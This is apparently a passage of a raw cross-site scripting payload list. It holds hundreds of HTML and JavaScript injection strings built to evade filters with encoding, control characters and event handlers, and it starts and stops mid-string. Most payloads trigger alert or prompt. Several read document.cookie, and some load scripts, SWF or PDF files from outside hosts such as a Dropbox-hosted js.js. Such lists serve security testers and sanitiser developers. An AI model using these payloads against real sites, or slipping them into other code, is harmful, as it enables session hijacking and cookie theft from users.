/**/\\r\\n&#34;&#62;<h1/onmouseover=\\\'\\\\u0061lert(1)\\\'>\\r\\n<iframe/src=\\\"data:text/html,<svg &#111;&#110;load=alert(1)>\\\">\\r\\n<meta content=\\\"&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)\\\" http-equiv=\\\"refresh\\\"/>\\r\\n<svg><script xlink:href=data&colon;,window.open(\\\'https://www.google.com/\\\') </script\\r\\n<svg><script x:href=\\\'https://dl.dropbox.com/u/13018058/js.js\\\' {Opera}\\r\\n<meta http-equiv=\\\"refresh\\\" content=\\\"0;url=javascript:confirm(1)\\\">\\r\\n<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>\\r\\n<form><a href=\\\"javascript:\\\\u0061lert&#x28;1&#x29;\\\">X</script><img/*/src=\\\"worksinchrome&colon;prompt&#x28;1&#x29;\\\"/*/onerror=\\\'eval(src)\\\'>\\r\\n<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>\\r\\n<form><iframe &#09;&#10;&#11; src=\\\"javascript&#58;alert(1)\\\"&#11;&#10;&#09;;>\\r\\n<a href=\\\"data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\"&#09;&#10;&#11;>X</a\\r\\nhttp://www.google<script .com>alert(document.location)</script\\r\\n<a&#32;href&#61;&#91;&#00;&#93;\\\"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;\\\">XYZ</a\\r\\n<img/src=@&#32;&#13; onerror = prompt(\\\'&#49;\\\')\\r\\n<style/onload=prompt&#40;\\\'&#88;&#83;&#83;\\\'&#41;\\r\\n<script ^__^>alert(String.fromCharCode(49))</script ^__^\\r\\n</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(\\r\\n&#00;</form><input type&#61;\\\"date\\\" onfocus=\\\"alert(1)\\\">\\r\\n<form><textarea &#13; onkeyup=\\\'\\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074&#x28;1&#x29;\\\'>\\r\\n<script /***/>/***/confirm(\\\'\\\\uFF41\\\\uFF4C\\\\uFF45\\\\uFF52\\\\uFF54\\\\u1455\\\\uFF11\\\\u1450\\\')/***/</script /***/\\r\\n<iframe srcdoc=\\\'&lt;body onload=prompt&lpar;1&rpar;&gt;\\\'>\\r\\n<a href=\\\"javascript:void(0)\\\" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>\\r\\n<script ~~~>alert(0%0)</script ~~~>\\r\\n<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>\\r\\n<///style///><span %2F onmousemove=\\\'alert&lpar;1&rpar;\\\'>SPAN\\r\\n<img/src=\\\'http://i.imgur.com/P8mL8.jpg\\\' onmouseover=&Tab;prompt(1)\\r\\n&#34;&#62;<svg><style>{-o-link-source&colon;\\\'<body/onload=confirm(1)>\\\'\\r\\n&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}\\r\\n<marquee onstart=\\\'javascript:alert&#x28;1&#x29;\\\'>^__^\\r\\n<div/style=\\\"width:expression(confirm(1))\\\">X</div> {IE7}\\r\\n<iframe// src=javaSCRIPT&colon;alert(1)\\r\\n//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type=\\\'submit\\\'>//\\r\\n/*iframe/src*/<iframe/src=\\\"<iframe/src=@\\\"/onload=prompt(1) /*iframe/src*/>\\r\\n//|\\\\\\\\ <script //|\\\\\\\\ src=\\\'https://dl.dropbox.com/u/13018058/js.js\\\'> //|\\\\\\\\ </script //|\\\\\\\\\\r\\n</font>/<svg><style>{src&#x3A;\\\'<style/onload=this.onload=confirm(1)>\\\'</font>/</style>\\r\\n<a/href=\\\"javascript:&#13; javascript:prompt(1)\\\"><input type=\\\"X\\\">\\r\\n</plaintext\\\\></|\\\\><plaintext/onmouseover=prompt(1)\\r\\n</svg>\\\'\\\'<svg><script \\\'AQuickBrownFoxJumpsOverTheLazyDog\\\'>alert&#x28;1&#x29; {Opera}\\r\\n<a href=\\\"javascript&colon;\\\\u0061&#x6C;&#101%72t&lpar;1&rpar;\\\"><button>\\r\\n<div onmouseover=\\\'alert&lpar;1&rpar;\\\'>DIV</div>\\r\\n<iframe style=\\\"position:absolute;top:0;left:0;width:100%;height:100%\\\" onmouseover=\\\"prompt(1)\\\">\\r\\n<a href=\\\"jAvAsCrIpT&colon;alert&lpar;1&rpar;\\\">X</a>\\r\\n<embed src=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\">\\r\\n<object data=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\">\\r\\n<var onmouseover=\\\"prompt(1)\\\">On Mouse Over</var>\\r\\n<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>\\r\\n<img src=\\\"/\\\" =_=\\\" title=\\\"onerror=\\\'prompt(1)\\\'\\\">\\r\\n<%<!--\\\'%><script>alert(1);</script -->\\r\\n<script src=\\\"data:text/javascript,alert(1)\\\"></script>\\r\\n<iframe/src \\\\/\\\\/onload = prompt(1)\\r\\n<iframe/onreadystatechange=alert(1)\\r\\n<svg/onload=alert(1)\\r\\n<input value=<><iframe/src=javascript:confirm(1)\\r\\n<input type=\\\"text\\\" value=`` <div/onmouseover=\\\'alert(1)\\\'>X</div>\\r\\nhttp://www.<script>alert(1)</script .com\\r\\n<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>\\r\\n<svg><script ?>alert(1)\\r\\n<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>\\r\\n<img src=`xx:xx`onerror=alert(1)>\\r\\n<object type=\\\"text/x-scriptlet\\\" data=\\\"http://jsfiddle.net/XLE63/ \\\"></object>\\r\\n<meta http-equiv=\\\"refresh\\\" content=\\\"0;javascript&colon;alert(1)\\\"/>\\r\\n<math><a xlink:href=\\\"//jsfiddle.net/t846h/\\\">click\\r\\n<embed code=\\\"http://businessinfo.co.uk/labs/xss/xss.swf\\\" allowscriptaccess=always>\\r\\n<svg contentScriptType=text/vbs><script>MsgBox+1\\r\\n<a href=\\\"data:text/html;base64_,<svg/onload=\\\\u0061&#x6C;&#101%72t(1)>\\\">X</a\\r\\n<iframe/onreadystatechange=\\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074(\\\'\\\\u0061\\\') worksinIE>\\r\\n<script>~\\\'\\\\u0061\\\' ; \\\\u0074\\\\u0068\\\\u0072\\\\u006F\\\\u0077 ~ \\\\u0074\\\\u0068\\\\u0069\\\\u0073. \\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074(~\\\'\\\\u0061\\\')</script U+\\r\\n<script/src=\\\"data&colon;text%2Fj\\\\u0061v\\\\u0061script,\\\\u0061lert(\\\'\\\\u0061\\\')\\\"></script a=\\\\u0061 & /=%2F\\r\\n<script/src=data&colon;text/j\\\\u0061v\\\\u0061&#115&#99&#114&#105&#112&#116,\\\\u0061%6C%65%72%74(/XSS/)></script\\r\\n<object data=javascript&colon;\\\\u0061&#x6C;&#101%72t(1)>\\r\\n<script>+-+-1-+-+alert(1)</script>\\r\\n<body/onload=&lt;!--&gt;&#10alert(1)>\\r\\n<script itworksinallbrowsers>/*<script* */alert(1)</script\\r\\n<img src ?itworksonchrome?\\\\/onerror = alert(1)\\r\\n<svg><script>//&NewLine;confirm(1);</script </svg>\\r\\n<svg><script onlypossibleinopera:-)> alert(1)\\r\\n<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe\\r\\n<script x> alert(1) </script 1=2\\r\\n<div/onmouseover=\\\'alert(1)\\\'> style=\\\"x:\\\">\\r\\n<--`<img/src=` onerror=alert(1)> --!>\\r\\n<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>\\r\\n<div style=\\\"position:absolute;top:0;left:0;width:100%;height:100%\\\" onmouseover=\\\"prompt(1)\\\" onclick=\\\"alert(1)\\\">x</button>\\r\\n\\\"><img src=x onerror=window.open(\\\'https://www.google.com/\\\');>\\r\\n<form><button formaction=javascript&colon;alert(1)>CLICKME\\r\\n<math><a xlink:href=\\\"//jsfiddle.net/t846h/\\\">click\\r\\n<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>\\r\\n<iframe src=\\\"data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\\\"></iframe>\\r\\n<a href=\\\"data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203\\\">Click Me</a>\\r\\n<script\\\\x20type=\\\"text/javascript\\\">javascript:alert(1);</script>\\r\\n<script\\\\x3Etype=\\\"text/javascript\\\">javascript:alert(1);</script>\\r\\n<script\\\\x0Dtype=\\\"text/javascript\\\">javascript:alert(1);</script>\\r\\n<script\\\\x09type=\\\"text/javascript\\\">javascript:alert(1);</script>\\r\\n<script\\\\x0Ctype=\\\"text/javascript\\\">javascript:alert(1);</script>\\r\\n<script\\\\x2Ftype=\\\"text/javascript\\\">javascript:alert(1);</script>\\r\\n<script\\\\x0Atype=\\\"text/javascript\\\">javascript:alert(1);</script>\\r\\n\\\'`\\\"><\\\\x3Cscript>javascript:alert(1)</script> \\r\\n\\\'`\\\"><\\\\x00script>javascript:alert(1)</script>\\r\\n<img src=1 href=1 onerror=\\\"javascript:alert(1)\\\"></img>\\r\\n<audio src=1 href=1 onerror=\\\"javascript:alert(1)\\\"></audio>\\r\\n<video src=1 href=1 onerror=\\\"javascript:alert(1)\\\"></video>\\r\\n<body src=1 href=1 onerror=\\\"javascript:alert(1)\\\"></body>\\r\\n<image src=1 href=1 onerror=\\\"javascript:alert(1)\\\"></image>\\r\\n<object src=1 href=1 onerror=\\\"javascript:alert(1)\\\"></object>\\r\\n<script src=1 href=1 onerror=\\\"javascript:alert(1)\\\"></script>\\r\\n<svg onResize svg onResize=\\\"javascript:javascript:alert(1)\\\"></svg onResize>\\r\\n<title onPropertyChange title onPropertyChange=\\\"javascript:javascript:alert(1)\\\"></title onPropertyChange>\\r\\n<iframe onLoad iframe onLoad=\\\"javascript:javascript:alert(1)\\\"></iframe onLoad>\\r\\n<body onMouseEnter body onMouseEnter=\\\"javascript:javascript:alert(1)\\\"></body onMouseEnter>\\r\\n<body onFocus body onFocus=\\\"javascript:javascript:alert(1)\\\"></body onFocus>\\r\\n<frameset onScroll frameset onScroll=\\\"javascript:javascript:alert(1)\\\"></frameset onScroll>\\r\\n<script onReadyStateChange script onReadyStateChange=\\\"javascript:javascript:alert(1)\\\"></script onReadyStateChange>\\r\\n<html onMouseUp html onMouseUp=\\\"javascript:javascript:alert(1)\\\"></html onMouseUp>\\r\\n<body onPropertyChange body onPropertyChange=\\\"javascript:javascript:alert(1)\\\"></body onPropertyChange>\\r\\n<svg onLoad svg onLoad=\\\"javascript:javascript:alert(1)\\\"></svg onLoad>\\r\\n<body onPageHide body onPageHide=\\\"javascript:javascript:alert(1)\\\"></body onPageHide>\\r\\n<body onMouseOver body onMouseOver=\\\"javascript:javascript:alert(1)\\\"></body onMouseOver>\\r\\n<body onUnload body onUnload=\\\"javascript:javascript:alert(1)\\\"></body onUnload>\\r\\n<body onLoad body onLoad=\\\"javascript:javascript:alert(1)\\\"></body onLoad>\\r\\n<bgsound onPropertyChange bgsound onPropertyChange=\\\"javascript:javascript:alert(1)\\\"></bgsound onPropertyChange>\\r\\n<html onMouseLeave html onMouseLeave=\\\"javascript:javascript:alert(1)\\\"></html onMouseLeave>\\r\\n<html onMouseWheel html onMouseWheel=\\\"javascript:javascript:alert(1)\\\"></html onMouseWheel>\\r\\n<style onLoad style onLoad=\\\"javascript:javascript:alert(1)\\\"></style onLoad>\\r\\n<iframe onReadyStateChange iframe onReadyStateChange=\\\"javascript:javascript:alert(1)\\\"></iframe onReadyStateChange>\\r\\n<body onPageShow body onPageShow=\\\"javascript:javascript:alert(1)\\\"></body onPageShow>\\r\\n<style onReadyStateChange style onReadyStateChange=\\\"javascript:javascript:alert(1)\\\"></style onReadyStateChange>\\r\\n<frameset onFocus frameset onFocus=\\\"javascript:javascript:alert(1)\\\"></frameset onFocus>\\r\\n<applet onError applet onError=\\\"javascript:javascript:alert(1)\\\"></applet onError>\\r\\n<marquee onStart marquee onStart=\\\"javascript:javascript:alert(1)\\\"></marquee onStart>\\r\\n<script onLoad script onLoad=\\\"javascript:javascript:alert(1)\\\"></script onLoad>\\r\\n<html onMouseOver html onMouseOver=\\\"javascript:javascript:alert(1)\\\"></html onMouseOver>\\r\\n<html onMouseEnter html onMouseEnter=\\\"javascript:parent.javascript:alert(1)\\\"></html onMouseEnter>\\r\\n<body onBeforeUnload body onBeforeUnload=\\\"javascript:javascript:alert(1)\\\"></body onBeforeUnload>\\r\\n<html onMouseDown html onMouseDown=\\\"javascript:javascript:alert(1)\\\"></html onMouseDown>\\r\\n<marquee onScroll marquee onScroll=\\\"javascript:javascript:alert(1)\\\"></marquee onScroll>\\r\\n<xml onPropertyChange xml onPropertyChange=\\\"javascript:javascript:alert(1)\\\"></xml onPropertyChange>\\r\\n<frameset onBlur frameset onBlur=\\\"javascript:javascript:alert(1)\\\"></frameset onBlur>\\r\\n<applet onReadyStateChange applet onReadyStateChange=\\\"javascript:javascript:alert(1)\\\"></applet onReadyStateChange>\\r\\n<svg onUnload svg onUnload=\\\"javascript:javascript:alert(1)\\\"></svg onUnload>\\r\\n<html onMouseOut html onMouseOut=\\\"javascript:javascript:alert(1)\\\"></html onMouseOut>\\r\\n<body onMouseMove body onMouseMove=\\\"javascript:javascript:alert(1)\\\"></body onMouseMove>\\r\\n<body onResize body onResize=\\\"javascript:javascript:alert(1)\\\"></body onResize>\\r\\n<object onError object onError=\\\"javascript:javascript:alert(1)\\\"></object onError>\\r\\n<body onPopState body onPopState=\\\"javascript:javascript:alert(1)\\\"></body onPopState>\\r\\n<html onMouseMove html onMouseMove=\\\"javascript:javascript:alert(1)\\\"></html onMouseMove>\\r\\n<applet onreadystatechange applet onreadystatechange=\\\"javascript:javascript:alert(1)\\\"></applet onreadystatechange>\\r\\n<body onpagehide body onpagehide=\\\"javascript:javascript:alert(1)\\\"></body onpagehide>\\r\\n<svg onunload svg onunload=\\\"javascript:javascript:alert(1)\\\"></svg onunload>\\r\\n<applet onerror applet onerror=\\\"javascript:javascript:alert(1)\\\"></applet onerror>\\r\\n<body onkeyup body onkeyup=\\\"javascript:javascript:alert(1)\\\"></body onkeyup>\\r\\n<body onunload body onunload=\\\"javascript:javascript:alert(1)\\\"></body onunload>\\r\\n<iframe onload iframe onload=\\\"javascript:javascript:alert(1)\\\"></iframe onload>\\r\\n<body onload body onload=\\\"javascript:javascript:alert(1)\\\"></body onload>\\r\\n<html onmouseover html onmouseover=\\\"javascript:javascript:alert(1)\\\"></html onmouseover>\\r\\n<object onbeforeload object onbeforeload=\\\"javascript:javascript:alert(1)\\\"></object onbeforeload>\\r\\n<body onbeforeunload body onbeforeunload=\\\"javascript:javascript:alert(1)\\\"></body onbeforeunload>\\r\\n<body onfocus body onfocus=\\\"javascript:javascript:alert(1)\\\"></body onfocus>\\r\\n<body onkeydown body onkeydown=\\\"javascript:javascript:alert(1)\\\"></body onkeydown>\\r\\n<iframe onbeforeload iframe onbeforeload=\\\"javascript:javascript:alert(1)\\\"></iframe onbeforeload>\\r\\n<iframe src iframe src=\\\"javascript:javascript:alert(1)\\\"></iframe src>\\r\\n<svg onload svg onload=\\\"javascript:javascript:alert(1)\\\"></svg onload>\\r\\n<html onmousemove html onmousemove=\\\"javascript:javascript:alert(1)\\\"></html onmousemove>\\r\\n<body onblur body onblur=\\\"javascript:javascript:alert(1)\\\"></body onblur>\\r\\n\\\\x3Cscript>javascript:alert(1)</script>\\r\\n\\\'\\\"`><script>/* *\\\\x2Fjavascript:alert(1)// */</script>\\r\\n<script>javascript:alert(1)</script\\\\x0D\\r\\n<script>javascript:alert(1)</script\\\\x0A\\r\\n<script>javascript:alert(1)</script\\\\x0B\\r\\n<script charset=\\\"\\\\x22>javascript:alert(1)</script>\\r\\n<!--\\\\x3E<img src=xxx:x onerror=javascript:alert(1)> -->\\r\\n--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->\\r\\n--><!-- --\\\\x00> <img src=xxx:x onerror=javascript:alert(1)> -->\\r\\n--><!-- --\\\\x21> <img src=xxx:x onerror=javascript:alert(1)> -->\\r\\n--><!-- --\\\\x3E> <img src=xxx:x onerror=javascript:alert(1)> -->\\r\\n`\\\"\\\'><img src=\\\'#\\\\x27 onerror=javascript:alert(1)>\\r\\n<a href=\\\"javascript\\\\x3Ajavascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n\\\"\\\'`><p><svg><script>a=\\\'hello\\\\x27;javascript:alert(1)//\\\';</script></p>\\r\\n<a href=\\\"javas\\\\x00cript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"javas\\\\x07cript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"javas\\\\x0Dcript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"javas\\\\x0Acript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"javas\\\\x08cript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"javas\\\\x02cript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"javas\\\\x03cript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"javas\\\\x04cript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"javas\\\\x01cript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"javas\\\\x05cript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"javas\\\\x0Bcript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"javas\\\\x09cript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"javas\\\\x06cript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"javas\\\\x0Ccript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<script>/* *\\\\x2A/javascript:alert(1)// */</script>\\r\\n<script>/* *\\\\x00/javascript:alert(1)// */</script>\\r\\n<style></style\\\\x3E<img src=\\\"about:blank\\\" onerror=javascript:alert(1)//></style>\\r\\n<style></style\\\\x0D<img src=\\\"about:blank\\\" onerror=javascript:alert(1)//></style>\\r\\n<style></style\\\\x09<img src=\\\"about:blank\\\" onerror=javascript:alert(1)//></style>\\r\\n<style></style\\\\x20<img src=\\\"about:blank\\\" onerror=javascript:alert(1)//></style>\\r\\n<style></style\\\\x0A<img src=\\\"about:blank\\\" onerror=javascript:alert(1)//></style>\\r\\n\\\"\\\'`>ABC<div style=\\\"font-family:\\\'foo\\\'\\\\x7Dx:expression(javascript:alert(1);/*\\\';\\\">DEF \\r\\n\\\"\\\'`>ABC<div style=\\\"font-family:\\\'foo\\\'\\\\x3Bx:expression(javascript:alert(1);/*\\\';\\\">DEF \\r\\n<script>if(\\\"x\\\\\\\\xE1\\\\x96\\\\x89\\\".length==2) { javascript:alert(1);}</script>\\r\\n<script>if(\\\"x\\\\\\\\xE0\\\\xB9\\\\x92\\\".length==2) { javascript:alert(1);}</script>\\r\\n<script>if(\\\"x\\\\\\\\xEE\\\\xA9\\\\x93\\\".length==2) { javascript:alert(1);}</script>\\r\\n\\\'`\\\"><\\\\x3Cscript>javascript:alert(1)</script>\\r\\n\\\'`\\\"><\\\\x00script>javascript:alert(1)</script>\\r\\n\\\"\\\'`><\\\\x3Cimg src=xxx:x onerror=javascript:alert(1)>\\r\\n\\\"\\\'`><\\\\x00img src=xxx:x onerror=javascript:alert(1)>\\r\\n<script src=\\\"data:text/plain\\\\x2Cjavascript:alert(1)\\\"></script>\\r\\n<script src=\\\"data:\\\\xD4\\\\x8F,javascript:alert(1)\\\"></script>\\r\\n<script src=\\\"data:\\\\xE0\\\\xA4\\\\x98,javascript:alert(1)\\\"></script>\\r\\n<script src=\\\"data:\\\\xCB\\\\x8F,javascript:alert(1)\\\"></script>\\r\\n<script\\\\x20type=\\\"text/javascript\\\">javascript:alert(1);</script>\\r\\n<script\\\\x3Etype=\\\"text/javascript\\\">javascript:alert(1);</script>\\r\\n<script\\\\x0Dtype=\\\"text/javascript\\\">javascript:alert(1);</script>\\r\\n<script\\\\x09type=\\\"text/javascript\\\">javascript:alert(1);</script>\\r\\n<script\\\\x0Ctype=\\\"text/javascript\\\">javascript:alert(1);</script>\\r\\n<script\\\\x2Ftype=\\\"text/javascript\\\">javascript:alert(1);</script>\\r\\n<script\\\\x0Atype=\\\"text/javascript\\\">javascript:alert(1);</script>\\r\\nABC<div style=\\\"x\\\\x3Aexpression(javascript:alert(1)\\\">DEF\\r\\nABC<div style=\\\"x:expression\\\\x5C(javascript:alert(1)\\\">DEF\\r\\nABC<div style=\\\"x:expression\\\\x00(javascript:alert(1)\\\">DEF\\r\\nABC<div style=\\\"x:exp\\\\x00ression(javascript:alert(1)\\\">DEF\\r\\nABC<div style=\\\"x:exp\\\\x5Cression(javascript:alert(1)\\\">DEF\\r\\nABC<div style=\\\"x:\\\\x0Aexpression(javascript:alert(1)\\\">DEF\\r\\nABC<div style=\\\"x:\\\\x09expression(javascript:alert(1)\\\">DEF\\r\\nABC<div style=\\\"x:\\\\xE3\\\\x80\\\\x80expression(javascript:alert(1)\\\">DEF\\r\\nABC<div style=\\\"x:\\\\xE2\\\\x80\\\\x84expression(javascript:alert(1)\\\">DEF\\r\\nABC<div style=\\\"x:\\\\xC2\\\\xA0expression(javascript:alert(1)\\\">DEF\\r\\nABC<div style=\\\"x:\\\\xE2\\\\x80\\\\x80expression(javascript:alert(1)\\\">DEF\\r\\nABC<div style=\\\"x:\\\\xE2\\\\x80\\\\x8Aexpression(javascript:alert(1)\\\">DEF\\r\\nABC<div style=\\\"x:\\\\x0Dexpression(javascript:alert(1)\\\">DEF\\r\\nABC<div style=\\\"x:\\\\x0Cexpression(javascript:alert(1)\\\">DEF\\r\\nABC<div style=\\\"x:\\\\xE2\\\\x80\\\\x87expression(javascript:alert(1)\\\">DEF\\r\\nABC<div style=\\\"x:\\\\xEF\\\\xBB\\\\xBFexpression(javascript:alert(1)\\\">DEF\\r\\nABC<div style=\\\"x:\\\\x20expression(javascript:alert(1)\\\">DEF\\r\\nABC<div style=\\\"x:\\\\xE2\\\\x80\\\\x88expression(javascript:alert(1)\\\">DEF\\r\\nABC<div style=\\\"x:\\\\x00expression(javascript:alert(1)\\\">DEF\\r\\nABC<div style=\\\"x:\\\\xE2\\\\x80\\\\x8Bexpression(javascript:alert(1)\\\">DEF\\r\\nABC<div style=\\\"x:\\\\xE2\\\\x80\\\\x86expression(javascript:alert(1)\\\">DEF\\r\\nABC<div style=\\\"x:\\\\xE2\\\\x80\\\\x85expression(javascript:alert(1)\\\">DEF\\r\\nABC<div style=\\\"x:\\\\xE2\\\\x80\\\\x82expression(javascript:alert(1)\\\">DEF\\r\\nABC<div style=\\\"x:\\\\x0Bexpression(javascript:alert(1)\\\">DEF\\r\\nABC<div style=\\\"x:\\\\xE2\\\\x80\\\\x81expression(javascript:alert(1)\\\">DEF\\r\\nABC<div style=\\\"x:\\\\xE2\\\\x80\\\\x83expression(javascript:alert(1)\\\">DEF\\r\\nABC<div style=\\\"x:\\\\xE2\\\\x80\\\\x89expression(javascript:alert(1)\\\">DEF\\r\\n<a href=\\\"\\\\x0Bjavascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x0Fjavascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\xC2\\\\xA0javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x05javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\xE1\\\\xA0\\\\x8Ejavascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x18javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x11javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\xE2\\\\x80\\\\x88javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\xE2\\\\x80\\\\x89javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\xE2\\\\x80\\\\x80javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x17javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x03javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x0Ejavascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x1Ajavascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x00javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x10javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\xE2\\\\x80\\\\x82javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x20javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x13javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x09javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\xE2\\\\x80\\\\x8Ajavascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x14javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x19javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\xE2\\\\x80\\\\xAFjavascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x1Fjavascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\xE2\\\\x80\\\\x81javascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a href=\\\"\\\\x1Djavascript:javascript:alert(1)\\\" id=\\\"fuzzelement1\\\">test</a>\\r\\n<a 